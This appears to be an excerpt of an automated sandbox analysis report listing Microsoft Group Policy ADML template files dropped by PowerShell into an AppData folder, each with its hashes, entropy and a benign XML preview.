                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Component name -->.. <string id="Cat_FileShareShadowCopyProvider">File Share Shadow Copy Provider</string>.. Component name -->.... <string id="Pol_EncryptProtocol">Allow or Disallow use of encryption to protect the RPC protocol messages between File Share Shadow Copy Provider running on application server and File Share Shadow Copy Agent running on the file servers.</string>.. <string id="Pol_EncryptProtocol_Help">Determines whether the RPC protocol messagese used by VSS for SMB2 File Shares feat

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\FileSys.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5047
                                                                                                                                                                                                        Entropy (8bit):4.778189792452432
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fK0BR2avs7FFiTs5UXs5Zg3NZRWwzL9oaVdQMxITRnRZ6LutwOXsQU:LeD5pmus7asQsyxVOnJIV
                                                                                                                                                                                                        MD5:F1951FB8C3B9EEBE23ABEF5EE23DBA39
                                                                                                                                                                                                        SHA1:FBAB4967D796A04FB164024D8C543D676E44BD24
                                                                                                                                                                                                        SHA-256:40A867EB9B6B1644CDF87AC77D346485DA153B245603237FA9A76E2C68ACFD4B
                                                                                                                                                                                                        SHA-512:9604C7324D2FE2EC3C40D90E0C3747B6BBBF20186F7A6A695D947C9F1FEB727875066CC700C31291BA156C0BA83893917AF4A7BEDC37208D4500B88DF22D9079
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Filesystem">Filesystem</string>.. <string id="NTFS">NTFS</string>.. <string id="SymlinkEvalExplain">Symbolic links can introduce vulnerabilities in certain applications. To mitigate this issue, you can selectively enable or disable the evaluation of these types of symbolic links:....Local Link to a Local Target..Local Link to a Remote Target..Remote Link to Remote Target..Remote Link to Local Target....For further information please refer to the Windows Help section....NOTE: If this policy is Disabled or

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\FolderRedirection.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7951
                                                                                                                                                                                                        Entropy (8bit):4.723629934992763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm0w3a/059U9dRz1zAkpsx1zAkWMOUH+fH/s3RpeWCBNTAynMydWcS5Pv0rA:EEVzAT7p67WMF+3s3RV5yMydWz5P0A
                                                                                                                                                                                                        MD5:B0E17494D027C66AD4CC97FE5D2E6108
                                                                                                                                                                                                        SHA1:D382CFCD7145A738FC23FE78BC925DB11E9C5A42
                                                                                                                                                                                                        SHA-256:0144A87B8D59221D8C76B55A64743F6AD72FEC812242669C05421D4D07321383
                                                                                                                                                                                                        SHA-512:65256FCD792B464E49B8A04D00442F5B4FC358337E3F6B3DDA4F3B14BA7C460A9825F1D7FF22A2C39FC1A12C188C724C0C82D3FB1A602D193D5F693D8D4335BA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Fdeploy_Cat">Folder Redirection</string>.. <string id="LocalizeXPRelativePaths">Use localized subfolder names when redirecting Start Menu and My Documents</string>.. <string id="LocalizeXPRelativePaths_Help">This policy setting allows the administrator to define whether Folder Redirection should use localized names for the All Programs, Startup, My Music, My Pictures, and My Videos subfolders when redirecting the parent Start Menu and legacy My Documents folder respectively.....If you enable this policy s

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\FramePanes.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2163
                                                                                                                                                                                                        Entropy (8bit):4.8446705224824
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEThu85fKbISIiSPks6/jvY/wAibISvVviR0OlnIcBV:cgeD5x8gm8fK+oKWkx7v7SmVviBV
                                                                                                                                                                                                        MD5:15395250ABFE245E09EDEA1B6537814E
                                                                                                                                                                                                        SHA1:BCD13824A7D7E4DDDF9F7F60EEC6149D6F10F1D4
                                                                                                                                                                                                        SHA-256:CADF1A1ED7AF5758824AC8A710730356758359E4CF0B61B989B76A3BA9DADFF0
                                                                                                                                                                                                        SHA-512:6C4337CD68D38FC32E6AA4BEAB133AEC2E7F4DA435092F7359CAF6859E24B3FC2C6D1D9F19886DEE9F726CF1F3BD993F4FF9F1A9F626024EC593486E75B81216
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ExplorerFramePanePolicies">Explorer Frame Pane</string>.. <string id="PreviewPane">Turn on or off details pane</string>.. <string id="PreviewPane_DropDownList_Show">Always show</string>.. <string id="PreviewPane_DropDownList_Hide">Always hide</string>.. <string id="PreviewPane_help">This policy setting shows or hides the Details Pane in File Explorer.....If you enable this policy setting and configure it to hide the pane, the Details Pane in File Explorer is hidden and cannot be turned on by the

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\GameExplorer.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1897
                                                                                                                                                                                                        Entropy (8bit):4.8809825480443285
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKl5wrZqMZDrABpO+ODR5/aAo19ArdFV:LeD5pmLGZqi4kRhaAo10dFV
                                                                                                                                                                                                        MD5:85EE206DDBF793929AC0467A02312D46
                                                                                                                                                                                                        SHA1:27550C4F8815DF919184B033AD36AD864CD5FA84
                                                                                                                                                                                                        SHA-256:9F9F0778ABA650963783D793C7253CA72B4A7CEF436A4E34D4B5AEA6DD65BB95
                                                                                                                                                                                                        SHA-512:B76B6D2E2F3B8B4B42CFD8B609EAAAEAC8B974C11D77CA00B5A32980C43EA9F415543D4C081F4E820D58D601A76EA098F01491820CEFD40E2766488923EAF889
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DownloadGameInfo">Turn off downloading of game information</string>.. <string id="DownloadGameInfo_Help">Manages download of game box art and ratings from the Windows Metadata Services.....If you enable this setting, game information including box art and ratings will not be downloaded. ....If you disable or do not configure this setting, game information will be downloaded from Windows Metadata Services.</string>.. <string id="GAMEUX">Game Explorer</string>.. <string id="ListRecentlyPlayed">Turn off

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Globalization.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (486), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):25531
                                                                                                                                                                                                        Entropy (8bit):4.651678772761436
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:3G+fZ/NAlGQpr1EVa+3+O+kDeZCwFBAA5ykHj0Yz0hSxqGq0:W6NAlGQpr2oSDy5PGwPH
                                                                                                                                                                                                        MD5:76A8A380A63A9348769B4A94D9EEF57F
                                                                                                                                                                                                        SHA1:B20DFDC04FB839A890E83A590020CCF263EB338E
                                                                                                                                                                                                        SHA-256:7FCB7F49FCEA58D4CFD70A65394DD7E7FD5404D7E51225FBB212035CEA78DF79
                                                                                                                                                                                                        SHA-512:D9F454A57DEE30397CA8233DBD9EBD3E136FBE53B99D34572A04960B6C2785F3B1FECC914B580FA1C033A8952C4C072FF264FAFD1345EB76083B21E3C1482A61
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomLocalesNoSelect">Disallow selection of Custom Locales</string>.. <string id="CustomLocalesNoSelect_Help">This policy setting prevents a user from selecting a supplemental custom locale as their user locale. The user is restricted to the set of locales that are installed with the operating system.....This does not affect the selection of replacement locales. To prevent the selection of replacement locales, adjust the permissions of the %windir%\Globalization directory to prevent the installation of locale

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\GroupPolicy-Server.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (301), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1487
                                                                                                                                                                                                        Entropy (8bit):4.93565859545614
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yczWOV1zWI6+xZAlxP84b6M119Z3icCV:cgeD5x8gm8fKmfg7I1/ZS9V
                                                                                                                                                                                                        MD5:721DE72286ED158412B12054999D879D
                                                                                                                                                                                                        SHA1:3E9668AD9CE409FC80B008D56BA0C213CEDD2B4B
                                                                                                                                                                                                        SHA-256:A87BB0424E1D7DEF0F6D544530A32ABB9ED6D448969FEB8C5985F30E0FD71B65
                                                                                                                                                                                                        SHA-512:A35D98E011DB3E0050FE3695F49576E2229F627D8A967907CB28B85A86762FD969D63CB89E4FE692CDA4B4F4211502F37B53C5C97FADC6A205E8174A63A9E285
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProcessTSUserLogonAsync">Allow asynchronous user Group Policy processing when logging on through Remote Desktop Services..</string>.. <string id="ProcessTSUserLogonAsync_Help">This policy setting allows Microsoft Windows to process user Group Policy settings asynchronously when logging on through Remote Desktop Services. Asynchronous user Group Policy processing is the default processing mode for Windows Vista and Windows XP.....By default, Window Server processes user Group Policy settings synchronously.....I

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\GroupPolicy.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (772), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60292
                                                                                                                                                                                                        Entropy (8bit):4.712085259009764
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:eOZhoxHoAJPf9Op1fJDBRLPz5E/tW/4HnQ:eOZ+xIGAlBRLPz5E/8gw
                                                                                                                                                                                                        MD5:3EC08BDFFA220598C2FE18E65DC57F55
                                                                                                                                                                                                        SHA1:7E91322DA98DAA4F971A0CEEE5589D0AA601A40E
                                                                                                                                                                                                        SHA-256:BF01A53E4DD9D9A982152BB2AF4F6B78DB2E6B26D0E3F80D192AC647FAFD3261
                                                                                                                                                                                                        SHA-512:ED99C8F50AD90322E3844D63A29E573B6DE5ACA73A1C9111757B8331B6325BE9D9840D3C0945F124E058BDAB07A364360B4ECFEF14CB472487ECF6DBB7A7B606
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ResetDfsClientInfoDuringRefreshPolicy">Enable AD/DFS domain controller synchronization during policy refresh</string>.. <string id="ResetDfsClientInfoDuringRefreshPolicy_Help">Enabling this setting will cause the Group Policy Client to connect to the same domain controller for DFS shares as is being used for Active Directory.....</string>.. <string id="DisableAOACProcessing">Turn off Group Policy Client Service AOAC optimization</string>.. <string id="DisableAOACProcessing_Help">This policy setting p

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\GroupPolicyPreferences.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (500), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):133320
                                                                                                                                                                                                        Entropy (8bit):4.822585844934633
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:TaSaHapabacaEa8aqapalasa4aMayauauaSa+awaOaW:Y
                                                                                                                                                                                                        MD5:D1A5CF9F95B52D0C47DE6C6BBA860D0A
                                                                                                                                                                                                        SHA1:112212D522046D296E4298AD5EEED40429FDAF28
                                                                                                                                                                                                        SHA-256:D79EED1FFB6836C73A921B8BD79195F3787C17CB15CEB9E27D682F27DAEA3AEF
                                                                                                                                                                                                        SHA-512:E79B6906D42A8F62A0D5B942C93C4A0A474DC6D841D7784D3EB49BDE7CA7B02F07E53D1DD2A0EE7D13974F9A9722F1A77A40C9F9A28F1DDF0955E46756F39034
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Group Policy Preference Policies</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="MMC_PrefApplications">Permit use of Application snap-ins</string>.. <string id="MMC_PrefApplications_Explain">This policy setting allows you to permit or prohibit use of Application snap-ins (Application preference item types). When prohibited, no Application preference item types appear when you attempt to create a new Application preference item, and you are unable to do so. This policy setting does not affect existing Application preference items.....If you enable or do not configure this policy setting, you permit use

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Help.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (399), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5647
                                                                                                                                                                                                        Entropy (8bit):4.726995944697996
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmkwXl3Bnrvb+st3rnZay5gok2TyV+EJlNifb/j4mRMFW78v/xvJ9xvJ7V:EG+stjZ3gyIzNiz9MFWAn9np
                                                                                                                                                                                                        MD5:3B1AD1ECF110F12067554FA487C740FD
                                                                                                                                                                                                        SHA1:0EE520F7EC886C23F0A431AA690C851B5EB0C5A2
                                                                                                                                                                                                        SHA-256:8DDB25B03AEAC60067CA82F72EDE2B7EBCEB1E48E196BAD69995C052FD2D2E86
                                                                                                                                                                                                        SHA-512:F16103456D09B6385240E7A30FBC9909F0383D1611B08E9E3EB8407BA97E5F462DF7E127E5B8F04842F4A7F54E71D13C30675906624E41CF012AAA6EE06D8731
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HelpQualifiedRootDir_Comp">Restrict potentially unsafe HTML Help functions to specified folders</string>.. <string id="HelpQualifiedRootDir_Help">This policy setting allows you to restrict certain HTML Help commands to function only in HTML Help (.chm) files within specified folders and their subfolders. Alternatively, you can disable these commands on the entire system. It is strongly recommended that only folders requiring administrative privileges be added to this policy setting..... If you enable th

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\HelpAndSupport.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3089
                                                                                                                                                                                                        Entropy (8bit):4.757831684112995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5J8gmk3TikjDKO5a+A7nQK2N7nCgQ1XlD0J4qXCdCEJaN5Z7aexmFV:LeD5hm4TiADLcXnQvnzUt0JBznFmFV
                                                                                                                                                                                                        MD5:FF9EF4C6BCE28ED5D6C68034CF5FB683
                                                                                                                                                                                                        SHA1:9CD42425C65E031C5D535FD63B8A113FCE81923E
                                                                                                                                                                                                        SHA-256:C121B0C89956299E7EA7212D382E199BDF50F51FE94634740934C56BAC669CAC
                                                                                                                                                                                                        SHA-512:A86DB211B742DA417D886D1C77B22E82B4B25F84C961B7C4ADA3CB64216A35A21DDCD211B50251467E11EA234356516A1245768D5F266DC1F8F346EBC56F2B84
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Online Assistance</displayName>.. <description>Online Assistance</description>.. <resources>.. <stringTable>.. <string id="Assistance">Online Assistance</string>.. <string id="windowscomponents">Windows Components</string>.. <string id="ActiveHelpPolicy_Explain">This policy setting specifies whether active content links in trusted assistance content are rendered. By default, the Help viewer renders trusted assistance content with active elements such as ShellExecute links and Guided Help links.....If you enable this policy setting, active content links are not rendered. The text is displayed, but there are no clickable links for these elements.....If you disable or do not configu

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ICM.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19360
                                                                                                                                                                                                        Entropy (8bit):4.641124398915221
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:m7xEdYC8St0ugzNQmh2z31TCIXBtbL+jc98MK1X:zLtk27p1MMK1X
                                                                                                                                                                                                        MD5:17CAE97BBE2A02C66C6FBDD54652B33E
                                                                                                                                                                                                        SHA1:2CCB62039419D7D7D93EA8B04D7A3E587D80DC06
                                                                                                                                                                                                        SHA-256:CAB1DD5C4B264CD58F17F3CD2C16775A7ABF379558F7506DD55FC363CA90C656
                                                                                                                                                                                                        SHA-512:3ACB5C95A38AEB54C4FF0DD0735B6C0FEF4536EA22764455D16A90A0CC8A36655AD5E8E1D964429765818E06A15A90AE7AB4AA3EE556746235FA62C074C0B3C6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CertMgr_DisableAutoRootUpdates">Turn off Automatic Root Certificates Update</string>.. <string id="CertMgr_DisableAutoRootUpdates_Help">This policy setting specifies whether to automatically update root certificates using the Windows Update website. ....Typically, a certificate is used when you use a secure website or when you send and receive secure email. Anyone can issue certificates, but to have transactions that are as secure as possible, certificates must be issued by a trusted certificate authority (CA)

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\IIS.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (743), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1408
                                                                                                                                                                                                        Entropy (8bit):4.880333709783744
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y+kZDqGIZ0DafLMezn6FI2gFV:cgeD5x8gm8fKIZDqGTaYeeFcFV
                                                                                                                                                                                                        MD5:426B83EC085AE7511EF7836624778786
                                                                                                                                                                                                        SHA1:510FB2D8410021336EC73B9757A5E1A85FFA902B
                                                                                                                                                                                                        SHA-256:73B3CBE01F0416F6DE28395E5B9AC286C8149D0F46BAB6AE86B6AC4E58B0F803
                                                                                                                                                                                                        SHA-512:DECBFE7A847491E79F7CAD8AF64CDB650F82424CE657D44D8A8E9CF1BDFA413959DFD79349A88E8050EB6EB0715B4792AA2843E613A914C753A9211A07D2BF18
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="IIS">Internet Information Services</string>.. <string id="PreventIISInstall">Prevent IIS installation</string>.. <string id="PreventIISInstall_Help">"This policy setting prevents installation of Internet Information Services (IIS) on this computer. If you enable this policy setting, Internet Information Services (IIS) cannot be installed, and you will not be able to install Windows components or applications that require IIS. Users installing Windows components or applications that require IIS might not r

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\InetRes.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (592), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):457561
                                                                                                                                                                                                        Entropy (8bit):4.747379761820279
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:4ShXU4YfsUgEI5zZxU6AECqP68pxJXljJX2G439MYe1t8ob:ZMk43i1t8u
                                                                                                                                                                                                        MD5:10590CE50B19C233DDB6EEC95850C5F4
                                                                                                                                                                                                        SHA1:0E8CD5C92654B4655E317521164FE17548AC9284
                                                                                                                                                                                                        SHA-256:9775D601260260CA0BDB805FD89AA5C3C126B8706458404A2405711DFD708647
                                                                                                                                                                                                        SHA-512:9DEC09DF0555B8106AE2D1FE2C6405672A995687EB03B8382D0A23EF36FD273980FC15D4194142107FAFC59A148039BE7DF0FB22A4F9FC1153C06BE04AE4D18A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="11.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="InternetCPL_Advanced_Accessibility">Accessibility</string>.. <string id="InternetCPL_Advanced_International">International</string>.. <string id="InternetCPL_Advanced_Security">Security</string>.. <string id="InternetCPL_Connections">Connections Page</string>.. <string id="InternetCPL_Content">Content Page</string>.. <string id="InternetCPL_Content_Certificates">Certificates</string>.. <string id="InternetCPL_General_Appearance">Appearance</string>.. <string id="InternetCPL_Gener

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\InkWatson.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (309), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1426
                                                                                                                                                                                                        Entropy (8bit):4.787912997643585
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y8p/L1u10pKiuruwuNez27BshruwlOALVIVriFV:cgeD5x8gm8fKb2gzp7Be7OA5OOFV
                                                                                                                                                                                                        MD5:386AFC1D42FDA5DA7B89C46B35C02635
                                                                                                                                                                                                        SHA1:44DC5FF2A570253D5AE1C755604DFFE11EF58022
                                                                                                                                                                                                        SHA-256:3930ADC5CC37AC32F2C02C1C3F288CAD45F18DDB232D5226B78E9CF7632014C2
                                                                                                                                                                                                        SHA-512:32AFFF54025D2A4C313228C41DFF6C2858877F5B0341F1950C822021DD2D13F1C6B70A43761EECB204AAB83762FC48BC6548B4D40A3746B5AC11C8240C973786
                                                                                                                                                                                                        Malicious:false
